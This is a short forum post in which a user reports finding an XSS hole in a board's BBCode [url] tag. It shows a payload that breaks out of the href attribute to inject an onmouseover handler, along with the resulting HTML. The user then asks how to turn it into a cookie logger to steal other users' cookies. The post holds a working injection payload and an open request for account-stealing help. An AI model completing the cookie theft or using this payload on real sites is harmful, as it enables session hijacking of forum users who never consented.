TUPKO |
Regular user |

 |
|
Joined: Jun 24, 2008 |
Posts: 8 |
|
|
|
 |
 |
 |
|
Hi everyone! I think I found the XSS in BBCODE! So I need little help from you! When I am enter Code: | [url=http://www.somesite.com " onmouseover="alert(1);]HeLLo[/url] | and send a message to user from the source I get this Code: | <a href="http://www.somesite.com " onmouseover="alert(1);" target="_blank">HeLLo</a> | and this works fine , but i try to make a cookie loger but it is not working. Can you tell me if this could be used to steal cookies and how ???? |
|